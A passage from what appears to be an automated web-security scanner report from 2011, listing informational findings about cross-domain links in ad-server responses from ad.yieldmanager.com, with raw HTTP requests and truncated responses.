hYcUTHtVtPt5fM.rNtN.M8WphYTmxSgFmXQl6BGuVwBVz1ZljWGoyNEcVa1lpOjYWpCy3HW9UgW2GY94T-OK8MbodJ6vmsy0Go.jx895XU50ZqaQQXxY3iF6ANc80=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600362_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317600362_HERE" border="0" alt="">
</a>
...[SNIP]...

19.80. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD6ow3tseTRCs-tqzjHcy.5xKS.kqzQfynuVPr5AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2840894453%26r%3D0%26s%3D2126909,bbaea994-ed55-11e0-a2a0-78e7d162f036,1317601329790 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:22:10 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0257.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:22:10 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601329_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyLLNW6gHE0pFG9JGokHJBYFtCiVgaqig-fq4JcoPdLXanRnNziLDtxCn2EGlx5jtYFz4yMDUwS61sKND3.eRjSGGpmV5-hgHjIQIxmSTUXtP.ir0wpcVqRm6ZB-v7M0lYA4BMIVM5lX6Slx
...[SNIP]...
SyNkmPP6dPctndctT9g67X0zRoBtFwpJqBSRaML0AMvF8AFZ0Si0qCoVamSPJK8rHWjNCEGrYvoucNU8y20C-npcJNP3I55bLomejy.rsrucxrLrkynAVVjiviyXPW,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601329_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601329_HERE" border="0" alt="">
</a>
...[SNIP]...

19.81. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABuia83zubRCjMvEnDoFKmImlJonsh4OitDh-MjAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D615783940%26r%3D0%26s%3D2126909,fddf278e-ed56-11e0-8fad-78e7d15f8c04,1317601870334 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:12 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0174.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:31:12 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317601870_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljN1qhDAQhZ.GOwmJpv4gvYjrKtLVdkG2rDeiSVwXf2KjRbtP31AXX6DDMPOd4cxBpmeXdY0oQwwa2LWZ4SHToLaJYMW4Dj3Psy2EDMfEWJ9in5EAwZgcjtQ6k78K3OBtIzUDh5zFpj4cApYAACxksmynr8S
...[SNIP]...
Ym2aV.j5Il3R.Jq6438zxqJtGMUDUDsywZX4EY-bACKnp1LGsJxkaZQslryadGMwMMNcN6iIHfmVLWC3SVppXi-zBxOReyHJjoi-G7r7gsGi65MnSCKscvSQJz9Q==,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601870_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317601870_HERE" border="0" alt="">
</a>
...[SNIP]...

19.82. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AmUr7OPRCuqOuYi0Rb9Z40wvYs7slNR-Ce9CAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D172571110%26r%3D0%26s%3D2126909,462d795c-ed55-11e0-b45e-78e7d15fdc1e,1317601132650 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:57 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0181.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:18:57 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601132_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT9tugzAM.RreUJQLhVRoD6FRJ7SmGxKjEi-IJulgBdIFpqJ-.bJR9QdmWT7nWMe2jEhMoSRUryMtjw4ljRHBMsIrhQPowziOUYhwRNYBgv6YJopxBFO2OcgwY3.B1.xlYa5yyrJ0UW-UgSsHIDBWXJfWl6D
...[SNIP]...
VZ5EVfPou5vL.k5p98v5mmi0eYh7cuFZhsrfQMzEUPM5Cmd836ZMGlcaat1Serx8YjPIAeDm9m0K1yKlyhXy2PjrfDqO1U2XpQpq-G7.6obdVoq52hM9I5fgDV9XNu,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601132_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601132_HERE" border="0" alt="">
</a>
...[SNIP]...

19.83. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC3ecU3rt7RCtwYiu21AEeXXVowGoBDxM-RsztsAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D3977708441%26r%3D0%26s%3D2126909,25ff5716-ed52-11e0-9cb1-78e7d15f4c1c,1317599790170 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:56:30 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0117.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:56:30 GMT
Pragma: no-cache
Content-Length: 1842
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10758730);}
</script><!--/* OpenX Ja
...[SNIP]...
<noscript><iframe id="4e52d0714c6aa" name="4e52d0714c6aa" src="http://psa-d.openx.com/w/1.0/afr?auid=34591&cb=1317599790_HERE" frameborder="0" scrolling="no" width="728" height="90"><a href="http://ad.yieldmanager.com/clk?3,eAGlTl2LgzAQ.DW-SUj8FrkHvZxHsMp5SIt9EU3iWazGRo-Kv.7CWfoHuiy7M8PssMgMaO23zGqo03oNpA0PkGlQFyHLblwdBkGAHN.1ITRsT59JxEKMIAmjJLnl4X9hHyc7UhN7YV7u7MsLwR0DYAmZ3nfplnr
...[SNIP]...
a5YH1aHIfsM13Lx5.q.k3Xu2WZNDPUjFg1A4usGV-BmPi4AioGJdatBFOnTLHkreRzp5nYgprhbGLkF6aYYyOkOG0Uvowzl0sl65GJoRp.h4bLquOSK8NVUOX4A-XAc-8=,http://psa-d.openx.com/w/1.0/rc?cs=4e52d0714c6aa&cb=1317599790_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34591&cs=4e52d0714c6aa&cb=1317599790_HERE" border="0" alt=""></a>
...[SNIP]...

19.84. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH.F5UcePRCuCwtfo3B2knb2pKdjGhQkcWhYSkAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D2857559119%26r%3D0%26s%3D2126909,fcc5c5c6-ed54-11e0-b59a-78e7d1fa05a2,1317601009496 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:16:56 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0354.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:16:56 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317601009_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljNFqhDAURL.GNwkxuuoifdBNLdKNVBClvoia2OiqsdGy4tc31GV.oJdwMzOcO4bpNQ6ymVVDB7bUcSzbM0ykMrOtkKVDz.OQc7IdBF3T0JcooD42YORfXhs78f8Gn.H7odTGrp-Iw324PrhjACwhyf2Ivok
...[SNIP]...
RG8oITnHHy6FH3L7rO13XWTF9DoXoUrLKibANiZtMGGjGqsGolmLmCQslayRaumdiCGrJ3MbGOKmef4Fn5pla6mxYm11JWExVjOf2MNZMlZ5IpYBCNIn4Bvelzig==,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601009_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317601009_HERE" border="0" alt="">
</a>
...[SNIP]...

19.85. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADFKhLjl-PRCpXAjl72UGhsEsEBBlrlfT-Qd9TmAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D232964029%26r%3D0%26s%3D2126909,1392b75a-ed55-11e0-95e1-78e7d1f5a968,1317601047749 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:17:33 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0395.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:17:33 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317601047_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljNFqgzAUhp.GOwlJjDYiu4hNC27VrmDruhtRk85ia1x0VHz6hTp8gR0O53z.4T8.cgLfk1RQt0SYXEoBVwFycLXChPoU2jAIAuJAiDH0kN1HoWAcwYitN5V3YM.iPn-byUxO2UHN6p0y8OAAEKXjx3z6jil
...[SNIP]...
VNnJ3ROW3wfnlkL7ZdD0NnOczCW9MCDLoQcgSqk-0IKnU3x-KiQVcb01bLi5Z9bTmcQAt7k2rlVRjludA3uioNX9te6iHXRSvUPW9.7qXUeS21NIabqozjFxkpcu8=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601047_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317601047_HERE" border="0" alt="">
</a>
...[SNIP]...

19.86. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnFnpLYuHRCpLrTdS5UufZf6XS.ZW79MFa93pSAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3860644282%26r%3D0%26s%3D2126909,c2ce5668-ed53-11e0-853d-78e7d1f5c952,1317600482748 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:03 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0052.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:08:03 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317600482_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTUFugzAQfA03ZNlgKBHqwQRRocaokUgRvSBjOyUlYGpoQ3l9nRLlA12tdmdGs7PIDZHPOOaMeRB6kgUwRK7DH1AtfAFtGIYhdiDGgeNvsD2mkSAxginZFtzfk7-KN.HzisyMA7JPV.YSEHCJAcBK08sqfdI
...[SNIP]...
WipUWJyqVF9JZj7h9tu5mmwXKJ5SSmBZg0E3IGapD9DLjqjMiOGgyNMSVaHrUcG8uNMbQcf1G9PAnDfA9dOa8NPvWj1FOlWS9UV.VfXS111UgtjeGsuHH8AgBrc00=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600482_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317600482_HERE" border="0" alt="">
</a>
...[SNIP]...

19.87. http://ad.yieldmanager.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /imp?anmember=514&anprice=&Z=728x90&s=1722409&r=1&_salt=2008914531&u=http%3A%2F%2Fwww.igougo.com%2Fabout%2F&u=http://www.igougo.com/about/ HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:52:58 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0158.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 01:52:58 GMT
Pragma: no-cache
Content-Length: 383
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

// PubMatic ad tag (iFrame wrapped) : igougo_728X90_ATF | http://www.igougo.com | 728 x 90 Leaderboard | Audience Science PCI -->
document.write('<iframe width="728" scrolling="no" height="90" frameborder="0" src="http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21557/559/adtag.html" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" ></iframe>
...[SNIP]...

19.88. http://ad.yieldmanager.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

